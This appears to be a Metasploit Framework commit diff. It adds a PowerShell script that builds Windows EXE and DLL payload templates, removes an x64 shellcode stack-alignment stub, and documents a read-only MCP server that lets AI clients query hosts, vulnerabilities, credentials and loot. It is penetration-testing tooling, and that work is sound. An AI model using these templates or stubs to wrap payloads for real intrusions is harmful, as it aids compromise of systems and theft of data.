+    <edge source="block.0x1024" target="block.0x102c"/>
+    <edge source="block.0x102c" target="block.0x103d"/>
+    <edge source="block.0x103d" target="block.0x1048"/>
+    <edge source="block.0x1048" target="block.0x104c"/>
+    <edge source="block.0x104c" target="block.0x1055"/>
+    <edge source="block.0x1055" target="block.0x1061"/>
+    <edge source="block.0x1061" target="block.0x1066"/>
+    <edge source="block.0x1066" target="block.0x1086"/>
+    <edge source="block.0x1086" target="block.0x1087"/>
   </graph>
 </graphml>

data/templates/src/elf/dll/elf_dll_armle_template.s

@@ -88,5 +88,7 @@ strtab:
  db 0
  db 0
 strtabsz equ $ - strtab
+
+align 4
 global _start
 _start:

data/templates/src/elf/dll/elf_dll_riscv32le_template.s

@@ -94,5 +94,6 @@ strtab:
  db 0
 strtabsz equ $ - strtab
 
+align 4
 global _start
 _start:

data/templates/src/pe/README.md

@@ -2,9 +2,18 @@
 This directory contains the source code for the PE executable templates.
 
 ## Building
-Use the provided `build_all.bat` file, and run it from within the Visual Studio
-developer console. The batch file requires that the `%VCINSTALLDIR%` environment
-variable be defined (which it should be by default). The build script will
-create both the x86 and x64 templates before moving them into the correct
-folder. The current working directory when the build is run must be the source
-code directory (`pe`).
+Use the provided `build_all.ps1` script from within the Visual Studio developer
+console. The script requires that the `%VCINSTALLDIR%` environment variable be
+defined (which it should be by default). By default it builds all templates for
+both x86 and x64, then moves the outputs into the correct folder.
+
+```powershell
+# build everything
+.\build_all.ps1
+
+# build only x86
+.\build_all.ps1 -Architectures x86
+
+# build only EXE templates
+.\build_all.ps1 -Templates exe,exe_service
+```

data/templates/src/pe/build_all.bat

@@ -1,17 +0,0 @@
-@echo off
-
-echo Compiling DLLs
-
-for /D %%d in (dll*) do (
-  pushd "%%d"
-  call build.bat
-  popd
-)
-
-echo Compiling EXEs
-
-for /D %%e in (exe*) do (
-  pushd "%%e"
-  call build.bat
-  popd
-)

data/templates/src/pe/build_all.ps1

@@ -0,0 +1,230 @@
+<#
+.SYNOPSIS
+    Build all PE executable and DLL templates for Metasploit.
+
+.DESCRIPTION
+    Compiles x86 and x64 variants of the EXE, service EXE, DLL, GDI+ DLL, and
+    mixed-mode DLL templates using the MSVC toolchain. After linking, the EXE
+    templates are patched to lower the minimum subsystem version so they can run
+    on legacy Windows (NT 4.0+ for x86, Server 2003+ for x64). Modern MSVC
+    linkers enforce a floor of 5.01/5.02 which is too high for those targets.
+
+.PARAMETER Architectures
+    Which architectures to build. Defaults to both x86 and x64.
+
+.PARAMETER Templates
+    Which templates to build. Defaults to all of them.
+
+.EXAMPLE
+    .\build_all.ps1
+    .\build_all.ps1 -Architectures x86
+    .\build_all.ps1 -Templates exe,exe_service
+#>
+
+param(
+    [ValidateSet('x86', 'x64')]
+    [string[]]$Architectures = @('x86', 'x64'),
+
+    [ValidateSet('exe', 'exe_service', 'dll', 'dll_gdiplus', 'dll_mixed_mode')]
+    [string[]]$Templates = @('exe', 'exe_service', 'dll', 'dll_gdiplus', 'dll_mixed_mode')
+)
+
+$ErrorActionPreference = 'Stop'
+$ScriptDir = Split-Path -Parent $MyInvocation.MyCommand.Path
+$OutputDir = Resolve-Path (Join-Path $ScriptDir '..\..')
+
+# Each entry defines only what varies per template. The build function handles
+# the common logic: calling cl, optional 256KiB variant, PE version patching.
+#
+#   Dir          - subdirectory containing the source
+#   OutputFmt    - output filename format string, {0} is replaced with the architecture
+#   Source       - source file passed to cl
+#   ClFlags      - flags passed to cl (before /link)
+#   LinkLibs     - libraries passed to the linker (after /link)
+#   LinkRes      - optional .res file to link
+#   EntryPoint   - /entry value
+#   NoDefaultLib - if set, pass /NODEFAULTLIB to the linker
+#   RcArgs       - optional resource compiler arguments (run before cl)
+#   PatchVersion - if set, patch the PE subsystem version after linking
+#
+# DLL templates automatically get a 256KiB payload variant built alongside the
+# standard size. This is determined by the output extension, not a per-template flag.
+$BuildDefs = [ordered]@{
+    exe = @{
+        Dir          = 'exe'
+        OutputFmt    = 'template_{0}_windows.exe'
+        Source       = 'template.c'
+        ClFlags      = @('/GS-')
+        LinkLibs     = @('kernel32.lib')
+        EntryPoint   = 'main'
+        NoDefaultLib = $true
+        PatchVersion = $true
+    }
+    exe_service = @{
+        Dir          = 'exe_service'
+        OutputFmt    = 'template_{0}_windows_svc.exe'
+        Source       = 'template.c'
+        ClFlags      = @('/GS-', '/DBUILDMODE=2')
+        LinkLibs     = @('advapi32.lib', 'kernel32.lib')
+        EntryPoint   = 'main'
+        NoDefaultLib = $true
+        PatchVersion = $true
+    }
+    dll = @{
+        Dir          = 'dll'
+        OutputFmt    = 'template_{0}_windows.dll'
+        Source       = 'template.c'
+        ClFlags      = @('/LD', '/GS-', '/DBUILDMODE=2')
+        LinkLibs     = @('kernel32.lib')
+        LinkRes      = 'template.res'
+        EntryPoint   = 'DllMain'
+        RcArgs       = @('/v', 'template.rc')
+    }
+    dll_gdiplus = @{
+        Dir          = 'dll_gdiplus'
+        OutputFmt    = 'template_{0}_windows_dccw_gdiplus.dll'
+        Source       = '../dll/template.c'
+        ClFlags      = @('/LD', '/GS-', '/DBUILDMODE=2', '/I', '.', '/FI', 'exports.h')
+        LinkLibs     = @('kernel32.lib')
+        LinkRes      = 'template.res'
+        EntryPoint   = 'DllMain'
+        RcArgs       = @('/v', '/fo', 'template.res', '../dll/template.rc')
+    }
+    dll_mixed_mode = @{
+        Dir          = 'dll_mixed_mode'
+        OutputFmt    = 'template_{0}_windows_mixed_mode.dll'
+        Source       = 'template.cpp'
+        ClFlags      = @('/CLR', '/LD', '/GS-', '/I', '..\dll', '/DBUILDMODE=2')
+        LinkLibs     = @('mscoree.lib', 'kernel32.lib')
+        EntryPoint   = 'DllMain'
+    }
+}
+
+if (-not $env:VCINSTALLDIR) {
+    Write-Error 'VCINSTALLDIR is not set. Run this script from a Visual Studio Developer Command Prompt.'
+    exit 1
+}
+
+function Invoke-VCVars {
+    param([string]$Arch)
+    # vcvarsall.bat no-ops if VSCMD_VER is already set, so clear its state
+    # flags before re-running. Otherwise the second arch silently inherits
+    # the first arch's toolchain and produces wrong-architecture binaries.
+    foreach ($v in 'VSCMD_VER', 'VSCMD_ARG_TGT_ARCH', 'VSCMD_ARG_HOST_ARCH') {
+        [System.Environment]::SetEnvironmentVariable($v, $null, 'Process')
+    }
+    $vcvars = Join-Path $env:VCINSTALLDIR 'Auxiliary\Build\vcvarsall.bat'
+    cmd /c "`"$vcvars`" $Arch >nul 2>&1 && set" 2>&1 | ForEach-Object {
+        if ($_ -match '^([^=]+)=(.*)$') {
+            [System.Environment]::SetEnvironmentVariable($matches[1], $matches[2], 'Process')
+        }
+    }
+}
+
+function Invoke-Cl {
+    param(
+        [string[]]$ClFlags,
+        [string]$Source,
+        [string]$OutputName,
+        [string[]]$LinkLibs,
+        [string]$LinkRes,
+        [string]$EntryPoint,
+        [switch]$NoDefaultLib
+    )
+    $clArgs = $ClFlags + @($Source, "/Fe:$OutputName", '/link') + $LinkLibs
+    if ($LinkRes) { $clArgs += $LinkRes }
+    $clArgs += @("/entry:$EntryPoint", '/subsystem:WINDOWS')
+    if ($NoDefaultLib) { $clArgs += '/NODEFAULTLIB' }
+    & cl @clArgs
+    if ($LASTEXITCODE -ne 0) { Write-Error "cl failed for $OutputName" }
+}
+
+function Set-PEVersion {
+    param(
+        [string]$Path,
+        [int]$Major,
+        [int]$Minor
+    )
+    $bytes = [System.IO.File]::ReadAllBytes($Path)
+    $peOffset = [BitConverter]::ToInt32($bytes, 0x3C)
+    if ([System.Text.Encoding]::ASCII.GetString($bytes, $peOffset, 4) -ne "PE`0`0") {
+        Write-Error "$Path is not a valid PE file"
+        return
+    }
+    # PE optional header starts at peOffset + 24. Field offsets from its start:
+    #   +40: MajorOperatingSystemVersion (uint16)
+    #   +42: MinorOperatingSystemVersion (uint16)
+    #   +48: MajorSubsystemVersion      (uint16)
+    #   +50: MinorSubsystemVersion      (uint16)
+    # These offsets are identical for PE32 and PE32+.
+    $opt = $peOffset + 24
+    $verBytes = [BitConverter]::GetBytes([uint16]$Major)
+    $minBytes = [BitConverter]::GetBytes([uint16]$Minor)
+    $bytes[$opt + 40] = $verBytes[0]; $bytes[$opt + 41] = $verBytes[1]
+    $bytes[$opt + 42] = $minBytes[0]; $bytes[$opt + 43] = $minBytes[1]
+    $bytes[$opt + 48] = $verBytes[0]; $bytes[$opt + 49] = $verBytes[1]
+    $bytes[$opt + 50] = $minBytes[0]; $bytes[$opt + 51] = $minBytes[1]
+    [System.IO.File]::WriteAllBytes($Path, $bytes)
+    Write-Host "  Patched OS and subsystem version to ${Major}.${Minor}"
+}
+
+function Build-Template {
+    param([string]$Arch, [string]$Name)
+    $def = $BuildDefs[$Name]
+
+    Push-Location (Join-Path $ScriptDir $def.Dir)
+    try {
+        if ($def.RcArgs) {
+            & rc @($def.RcArgs)
+            if ($LASTEXITCODE -ne 0) { throw "rc failed for $Name ($Arch)" }
+        }
+
+        $outName = $def.OutputFmt -f $Arch
+        Invoke-Cl -ClFlags $def.ClFlags -Source $def.Source -OutputName $outName `
+                  -LinkLibs $def.LinkLibs -LinkRes $def.LinkRes `
+                  -EntryPoint $def.EntryPoint -NoDefaultLib:([bool]$def.NoDefaultLib)
+
+        if ($Name -like 'dll*') {
+            $outName256 = $outName -replace '(\.\w+)$', '.256kib$1'
+            Invoke-Cl -ClFlags ($def.ClFlags + '/DSCSIZE=262144') -Source $def.Source -OutputName $outName256 `
+                      -LinkLibs $def.LinkLibs -LinkRes $def.LinkRes `
+                      -EntryPoint $def.EntryPoint -NoDefaultLib:([bool]$def.NoDefaultLib)
+        }
+    } finally { Pop-Location }
+
+    if ($def.PatchVersion) {
+        $outPath = Join-Path $ScriptDir "$($def.Dir)\$outName"
+        if ($Arch -eq 'x86') {
+            Set-PEVersion -Path $outPath -Major 4 -Minor 0
+        } else {
+            Set-PEVersion -Path $outPath -Major 5 -Minor 2
+        }
+    }
+}
+
+# Build each requested template for each architecture
+foreach ($arch in $Architectures) {
+    Write-Host "`n=== Configuring for $arch ===" -ForegroundColor Cyan
+    Invoke-VCVars $arch
+
+    foreach ($tmpl in $Templates) {
+        Write-Host "`nBuilding: $tmpl ($arch)" -ForegroundColor Green
+        Build-Template -Arch $arch -Name $tmpl
+    }
+}
+
+# Clean intermediate files and move outputs
+Write-Host "`n=== Cleaning up ===" -ForegroundColor Cyan
+Get-ChildItem $ScriptDir -Recurse -File |
+    Where-Object { $_.Extension -in '.obj', '.res', '.exp', '.lib' } |
+    Remove-Item -Force
+
+Write-Host "`n=== Moving outputs to $OutputDir ===" -ForegroundColor Cyan
+Get-ChildItem $ScriptDir -Recurse -File |
+    Where-Object { $_.Extension -in '.exe', '.dll' } |
+    ForEach-Object {
+    Move-Item $_.FullName (Join-Path $OutputDir $_.Name) -Force
+    Write-Host "  $($_.Name)"
+}
+
+Write-Host "`nDone." -ForegroundColor Green

data/templates/src/pe/dll/build.bat

@@ -1,15 +0,0 @@
-@echo off
-
-if "%~1"=="" GOTO NO_ARGUMENTS
-echo Compiling for: %1
-call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
-rc /v template.rc
-cl /LD /GS- /DBUILDMODE=2 template.c /Fe:template_%1_windows.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
-cl /LD /GS- /DBUILDMODE=2 /DSCSIZE=262144 template.c /Fe:template_%1_windows.256kib.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
-exit /B
-
-:NO_ARGUMENTS
-%COMSPEC% /c "%0" x86
-%COMSPEC% /c "%0" x64
-del  *.obj *.res
-move *.dll ..\..\..

data/templates/src/pe/dll_gdiplus/build.bat

@@ -1,15 +0,0 @@
-@echo off
-
-if "%~1"=="" GOTO NO_ARGUMENTS
-echo Compiling for: %1
-call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
-rc /v /fo template.res ../dll/template.rc
-cl /LD /GS- /DBUILDMODE=2 /I . /FI exports.h ../dll/template.c /Fe:template_%1_windows_dccw_gdiplus.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
-cl /LD /GS- /DBUILDMODE=2 /DSCSIZE=262144 /I . /FI exports.h ../dll/template.c /Fe:template_%1_windows_dccw_gdiplus.256kib.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
-exit /B
-
-:NO_ARGUMENTS
-%COMSPEC% /c "%0" x86
-%COMSPEC% /c "%0" x64
-del  *.exp *.lib *.res *.obj
-move *.dll ..\..\..

data/templates/src/pe/dll_mixed_mode/build.bat

@@ -1,15 +0,0 @@
-@echo off
-
-if "%~1"=="" GOTO NO_ARGUMENTS
-echo Compiling for: %1
-call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
-rem mscoree.lib requires .NET SDK to be installed, add it as a Visual Studio component
-cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 template.cpp /Fe:template_%1_windows_mixed_mode.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
-cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 /DSCSIZE=262144 template.cpp /Fe:template_%1_windows_mixed_mode.256kib.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
-exit /B
-
-:NO_ARGUMENTS
-%COMSPEC% /c "%0" x86
-%COMSPEC% /c "%0" x64
-del  *.obj
-move *.dll ..\..\..

data/templates/src/pe/exe/build.bat

@@ -1,13 +0,0 @@
-@echo off
-
-if "%~1"=="" GOTO NO_ARGUMENTS
-echo Compiling for: %1
-call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
-cl /GS- template.c /Fe:template_%1_windows.exe /link kernel32.lib /entry:main /subsystem:WINDOWS /NODEFAULTLIB
-exit /B
-
-:NO_ARGUMENTS
-%COMSPEC% /c "%0" x86
-%COMSPEC% /c "%0" x64
-del  *.obj *.res
-move *.exe ..\..\..

data/templates/src/pe/exe_service/build.bat

@@ -1,13 +0,0 @@
-@echo off
-
-if "%~1"=="" GOTO NO_ARGUMENTS
-echo Compiling for: %1
-call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
-cl /GS- /DBUILDMODE=2 template.c /Fe:template_%1_windows_svc.exe /link advapi32.lib kernel32.lib /entry:main /subsystem:WINDOWS /NODEFAULTLIB
-exit /B
-
-:NO_ARGUMENTS
-%COMSPEC% /c "%0" x86
-%COMSPEC% /c "%0" x64
-del  *.obj *.res
-move *.exe ..\..\..

data/utilities/encrypted_payload/AdjustStack.asm

@@ -1,48 +0,0 @@
-/*
- * This code is provided under the 3-clause BSD license below.
- * ***********************************************************
- *
- * Copyright (c) 2013, Matthew Graeber
- * All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
- *
- *   Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
- *   Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
- *   The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.
- *
- * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-; Author:       Matthew Graeber (@mattifestation)
-; License:      BSD 3-Clause
-; Syntax:       MASM
-; Build Syntax: ml64 /c /Cx AdjustStack.asm
-; Output:       AdjustStack.obj
-; Notes: I really wanted to avoid having this external dependency but I couldnt
-; come up with any other way to guarantee 16-byte stack alignment in 64-bit
-; shellcode written in C.
-
-extern	ExecutePayload
-global  AlignRSP			; Marking AlignRSP as PUBLIC allows for the function
-							; to be called as an extern in our C code.
-
-segment .text
-
-; AlignRSP is a simple call stub that ensures that the stack is 16-byte aligned prior
-; to calling the entry point of the payload. This is necessary because 64-bit functions
-; in Windows assume that they were called with 16-byte stack alignment. When amd64
-; shellcode is executed, you cant be assured that you stack is 16-byte aligned. For example,
-; if your shellcode lands with 8-byte stack alignment, any call to a Win32 function will likely
-; crash upon calling any ASM instruction that utilizes XMM registers (which require 16-byte)
-; alignment.
-
-AlignRSP:
-	push	rsi						; Preserve RSI since were stomping on it
-	mov		rsi, rsp				; Save the value of RSP so it can be restored
-	and		rsp, 0FFFFFFFFFFFFFFF0h	; Align RSP to 16 bytes
-	sub		rsp, 020h				; Allocate homing space for ExecutePayload
-	call	ExecutePayload			; Call the entry point of the payload
-	mov		rsp, rsi				; Restore the original value of RSP
-	pop		rsi						; Restore RSI
-	ret								; Return to caller

data/utilities/encrypted_payload/func_order.ld

@@ -1,9 +0,0 @@
-ENTRY(_ExecutePayload)
-SECTIONS
-{
-	.text :
-	{
-		*(.text.ExecutePayload)
-	}
-
-}

data/utilities/encrypted_payload/func_order64.ld

@@ -1,11 +0,0 @@
-ENTRY(AlignRSP)
-SECTIONS
-{
-	.text :
-	{
-    *(.text.AlignRSP)
-		*(.text.ExecutePayload)
-		*(.text.GetProcAddressWithHash)
-	}
-
-}

db/schema.rb

@@ -10,7 +10,7 @@
 #
 # It's strongly recommended that you check this file into your version control system.
 
-ActiveRecord::Schema[7.2].define(version: 2026_01_30_124052) do
+ActiveRecord::Schema[7.2].define(version: 2026_04_11_000000) do
   # These are extensions that must be enabled in order to support this database
   enable_extension "plpgsql"
 
@@ -665,6 +665,8 @@ ActiveRecord::Schema[7.2].define(version: 2026_01_30_124052) do
     t.integer "session_id"
     t.integer "loot_id"
     t.text "fail_detail"
+    t.string "check_code"
+    t.text "check_detail"
   end
 
   create_table "vuln_details", id: :serial, force: :cascade do |t|

docs/metasploit-framework.wiki/How-to-parse-an-HTTP-response.md

@@ -64,7 +64,7 @@ Consider the following example as your HTML response:
 		<div id="french">Bonjour</div>
 	</div>
 </body>
-<html>
+</html>
 ```
 
 **Basic usage of #at**

docs/metasploit-framework.wiki/How-to-use-Metasploit-MCP-Server.md

@@ -0,0 +1,366 @@
+The Metasploit MCP Server (`msfmcpd`) provides AI applications with secure, structured access to Metasploit Framework data through the [Model Context Protocol](https://modelcontextprotocol.io/) (MCP). It acts as a middleware layer between AI clients (such as Claude, Cursor, or custom agents) and Metasploit, exposing 8 standardized tools for querying reconnaissance data and searching modules.
+
+This initial implementation is **read-only**. Only tools that query data (modules, hosts, services, vulnerabilities, etc.) are available. Tools for module execution, session interaction, and database modifications will be added in a future iteration.
+
+## Architecture
+
+```mermaid
+flowchart TD
+    ai_app["AI Application<br>(Claude, Cursor, etc.)"]
+
+    subgraph msfmcp_server["MsfMcp Server"]
+        mcp_layer["MCP Layer (8 Tools)<br>Input Validation / Rate Limiting / Response Transformation"]
+        rpc_manager["RPC Manager<br>Auto-detect / Auto-start / Lifecycle Management"]
+        api_client["Metasploit API Client<br>MessagePack RPC (port 55553) / JSON-RPC (port 8081)<br>Session Management"]
+
+        mcp_layer --> rpc_manager
+        rpc_manager --> api_client
+    end
+
+    msf["Metasploit Framework<br>(msfrpcd)"]
+
+    ai_app -- "MCP Protocol (stdio or HTTP)<br>JSON-RPC 2.0" --> mcp_layer
+    api_client -- "HTTP/HTTPS" --> msf
+```
+
+## Quick Start
+
+The simplest way to start the MCP server is with no arguments:
+
+```
+./msfmcpd
+```
+
+The server automatically detects whether a Metasploit RPC server is already running on the configured port. If not, it starts one automatically with randomly generated credentials.
+
+To use specific credentials:
+
+```
+./msfmcpd --user your_username --password your_password
+```
+
+## Configuration
+
+### Configuration File
+
+Copy the example configuration and edit it:
+
+```
+cp config/mcp_config.yaml.example config/mcp_config.yaml
+```
+
+A MessagePack RPC configuration looks like this:
+
+```yaml
+msf_api:
+  type: messagepack
+  host: localhost
+  port: 55553
+  ssl: true
+  endpoint: /api/
+  user: msfuser
+  password: CHANGEME
+  auto_start_rpc: true
+
+mcp:
+  transport: stdio
+
+rate_limit:
+  enabled: true
+  requests_per_minute: 60
+  burst_size: 10
+
+logging:
+  enabled: false
+  level: INFO
+  log_file: msfmcp.log
+```
+
+For JSON-RPC with bearer token authentication, use the JSON-RPC example instead:
+
+```
+cp config/mcp_config_jsonrpc.yaml.example config/mcp_config.yaml
+```
+
+### Command-Line Options
+
+```
+./msfmcpd --help
+
+Options:
+  --config PATH                Path to configuration file
+  --enable-logging             Enable file logging with sanitization
+  --log-file PATH              Log file path (overrides config file)
+  --user USER                  MSF API username (for MessagePack auth)
+  --password PASS              MSF API password (for MessagePack auth)
+  --no-auto-start-rpc          Disable automatic RPC server startup
+  --mcp-transport TRANSPORT    MCP server transport type ('stdio' or 'http')
+  -h, --help                   Show this help message
+  -v, --version                Show version information
+```
+
+### Environment Variable Overrides
+
+All configuration settings can be overridden by environment variables:
+
+| Variable | Description |
+|---|---|
+| `MSF_API_TYPE` | Connection type (`messagepack` or `json-rpc`) |
+| `MSF_API_HOST` | Metasploit RPC API host |
+| `MSF_API_PORT` | Metasploit RPC API port |
+| `MSF_API_SSL` | Use SSL for Metasploit RPC API (`true` or `false`) |
+| `MSF_API_ENDPOINT` | Metasploit RPC API endpoint |
+| `MSF_API_USER` | RPC API username (for MessagePack auth) |
+| `MSF_API_PASSWORD` | RPC API password (for MessagePack auth) |
+| `MSF_API_TOKEN` | RPC API token (for JSON-RPC auth) |
+| `MSF_AUTO_START_RPC` | Auto-start RPC server (`true` or `false`) |
+| `MSF_MCP_TRANSPORT` | MCP transport type (`stdio` or `http`) |
+| `MSF_MCP_HOST` | MCP server host (for HTTP transport) |
+| `MSF_MCP_PORT` | MCP server port (for HTTP transport) |
+
+Example using environment variables:
+
+```
+MSF_API_HOST=192.168.33.44 ./msfmcpd --config ./config/mcp_config.yaml
+```
+
+## Automatic RPC Server Management
+
+When using MessagePack RPC on localhost, the MCP server can automatically manage the Metasploit RPC server lifecycle. This is enabled by default.
+
+### How It Works
+
+1. **Detection**: On startup, the MCP server probes the configured RPC port to check if a server is already running.
+2. **Auto-start**: If no server is detected, it spawns the `msfrpcd` executable as a child process.
+3. **Credentials**: If no username and password are provided, random credentials are generated automatically and used for both the RPC server and client authentication.
+4. **Wait**: After starting, it polls the port until the RPC server becomes available (timeout: 30 seconds).
+5. **Shutdown**: When the MCP server shuts down (via Ctrl+C or SIGTERM), it cleans up the managed RPC process.
+
+**Note**: If an RPC server is already running, credentials must be provided via `--user`/`--password`, config file, or environment variables to authenticate with it.
+
+### Database Support
+
+The auto-started RPC server creates a framework instance with database support enabled by default. If the database is not running when the RPC server starts, a warning is displayed:
+
+```
+[WARNING] Database is not available. Some MCP tools that rely on the database will not work.
+[WARNING] Start the database and restart the MCP server to enable full functionality.
+```
+
+Tools that query the database (`msf_host_info`, `msf_service_info`, `msf_vulnerability_info`, `msf_note_info`, `msf_credential_info`, `msf_loot_info`) require a running database. To initialize and start the database:
+
+```
+msfdb init
+msfdb start
+```
+
+Then restart the MCP server.
+
+### Disabling Auto-Start
+
+Auto-start can be disabled in three ways:
+
+- CLI flag: `--no-auto-start-rpc`
+- Config file: `auto_start_rpc: false` in the `msf_api` section
+- Environment variable: `MSF_AUTO_START_RPC=false`
+
+Auto-start is also not available when:
+
+- The API type is `json-rpc` (requires SSL certificates and a web server)
+- The host is a remote address (cannot start a server on a remote machine)
+
+When auto-start is disabled and no RPC server is running, you must start `msfrpcd` manually:
+
+```
+msfrpcd -U your_username -P your_password -p 55553
+```
+
+## MCP Tools
+
+The server exposes 8 tools to AI applications via the MCP protocol.
+
+### msf_search_modules
+
+Search for Metasploit modules by keywords, CVE IDs, or module names.
+
+- `query` (string, required): Search terms (e.g., `windows smb`, `CVE-2017-0144`)
+- `limit` (integer, optional): Max results (1-1000, default: 100)
+- `offset` (integer, optional): Pagination offset (default: 0)
+
+### msf_module_info
+
+Get detailed information about a specific Metasploit module.
+
+- `type` (string, required): Module type (`exploit`, `auxiliary`, `post`, `payload`, `encoder`, `nop`)
+- `name` (string, required): Module path (e.g., `windows/smb/ms17_010_eternalblue`)
+
+Returns complete module details including options, targets, references, and authors.
+
+### msf_host_info
+
+Query discovered hosts from the Metasploit database.
+
+- `workspace` (string, optional): Workspace name (default: `default`)
+- `addresses` (string, optional): Filter by IP/CIDR (e.g., `192.168.1.0/24`)
+- `only_up` (boolean, optional): Only return alive hosts (default: false)
+- `limit` (integer, optional): Max results (1-1000, default: 100)
+- `offset` (integer, optional): Pagination offset (default: 0)
+
+### msf_service_info
+
+Query discovered services on hosts.
+
+- `workspace` (string, optional): Workspace name
+- `names` (string, optional): Filter by service names, comma-separated (e.g., `http`, `ldap,ssh`)
+- `host` (string, optional): Filter by host IP
+- `ports` (string, optional): Filter by port or range (e.g., `80,443` or `1-1024`)
+- `protocol` (string, optional): Protocol filter (`tcp` or `udp`)
+- `only_up` (boolean, optional): Only return running services (default: false)
+- `limit` (integer, optional): Max results (1-1000, default: 100)
+- `offset` (integer, optional): Pagination offset (default: 0)
+
+### msf_vulnerability_info
+
+Query discovered vulnerabilities.
+
+- `workspace` (string, optional): Workspace name
+- `names` (array of strings, optional): Filter by vulnerability names (exact, case-sensitive module names)
+- `host` (string, optional): Filter by host IP
+- `ports` (string, optional): Filter by port or range
+- `protocol` (string, optional): Protocol filter (`tcp` or `udp`)
+- `limit` (integer, optional): Max results (1-1000, default: 100)
+- `offset` (integer, optional): Pagination offset (default: 0)
+
+### msf_note_info
+
+Query notes stored in the database.
+
+- `workspace` (string, optional): Workspace name
+- `type` (string, optional): Filter by note type (e.g., `ssl.certificate`, `smb.fingerprint`)
+- `host` (string, optional): Filter by host IP
+- `ports` (string, optional): Filter by port or range
+- `protocol` (string, optional): Protocol filter (`tcp` or `udp`)
+- `limit` (integer, optional): Max results (1-1000, default: 100)
+- `offset` (integer, optional): Pagination offset (default: 0)
+
+### msf_credential_info
+
+Query discovered credentials.
+
+- `workspace` (string, optional): Workspace name
+- `limit` (integer, optional): Max results (1-1000, default: 100)
+- `offset` (integer, optional): Pagination offset (default: 0)
+
+### msf_loot_info
+
+Query collected loot (files, data dumps).
+
+- `workspace` (string, optional): Workspace name
+- `limit` (integer, optional): Max results (1-1000, default: 100)
+- `offset` (integer, optional): Pagination offset (default: 0)
+
+## Integration with AI Applications
+
+Add the MCP server to your AI application configuration. The exact format depends on the client.
+
+### Claude Desktop / Cursor
+
+```json
+{
+  "mcpServers": {
+    "metasploit": {
+      "command": "/path/to/metasploit-framework/msfmcpd",
+      "args": [
+        "--config",
+        "/path/to/config/mcp_config.yaml"
+      ],
+      "env": {}
+    }
+  }
+}
+```
+
+### Using RVM
+
+If you use RVM to manage Ruby versions, specify the full path to RVM so the correct Ruby and gemset are used:
+
+```json
+{
+  "mcpServers": {
+    "metasploit": {
+      "command": "/your/home_dir/.rvm/bin/rvm",
+      "args": [
+        "in",
+        "/path/to/metasploit-framework",
+        "do",
+        "./msfmcpd",
+        "--config",
+        "config/mcp_config.yaml"
+      ]
+    }
+  }
+}
+```
+
+## Security Considerations
+
+### Input Validation
+
+All tool parameters are validated against strict JSON schemas. IP addresses are validated using Ruby's `IPAddr` class with CIDR support, workspace names are restricted to alphanumeric characters plus underscore/hyphen, port ranges are validated (1-65535), and search queries are limited to 500 characters.
+
+### Credential Management
+
+Configuration files should use `chmod 600` permissions. Credentials are transmitted securely to the Metasploit Framework API and are never cached or logged by the MCP server.
+
+### Rate Limiting
+
+The server applies rate limiting to all MCP tools using a token bucket algorithm. Default: 60 requests per minute with a burst of 10 requests. This is configurable in the `rate_limit` section of the configuration file.
+
+### Logging
+
+Logging is disabled by default. When enabled (via `--enable-logging` or config), sensitive data (passwords, tokens, API keys) is automatically redacted. Log files should be protected with `chmod 600`.
+
+### Error Handling
+
+Stack traces are never exposed to clients. Error messages are sanitized to avoid leaking credentials. Metasploit API errors are wrapped in the MCP error format.
+
+## Testing with MCP Inspector
+
+The [MCP Inspector](https://github.com/modelcontextprotocol/inspector) is an interactive developer tool for testing and debugging MCP servers. It runs directly through `npx`:
+
+```
+npx @modelcontextprotocol/inspector
+```
+
+## Troubleshooting
+
+### Connection Refused or Timeout
+
+1. Verify the RPC daemon is running: `ps aux | grep msfrpcd`
+2. Check the port is listening: `netstat -an | grep 55553`
+3. Test connectivity: `curl -k -v https://localhost:55553/api/`
+
+### Authentication Failures
+
+For MessagePack RPC, verify the username and password in your configuration file or CLI arguments. For JSON-RPC, verify the bearer token is valid and has not expired.
+
+### Database Not Available
+
+If database-dependent tools return errors, ensure the database is running:
+
+```
+msfdb init
+msfdb start
+```
+
+Then restart the MCP server.
+
+### Rate Limit Exceeded
+
+Increase the rate limit in your configuration file:
+
+```yaml
+rate_limit:
+  requests_per_minute: 120
+  burst_size: 20
+```

docs/metasploit-framework.wiki/Metasploit-URL-support-proposal.md

@@ -14,7 +14,7 @@ Metasploit currently provides multiple options for configuring target details:
 
 Configuring this amount of options is cumbersome and time consuming on a per module basis. 
 
-Although it is is possible to globally setting common values with the `setg` command - and to individually override the ports on a per module basis, it is still an arduous task:
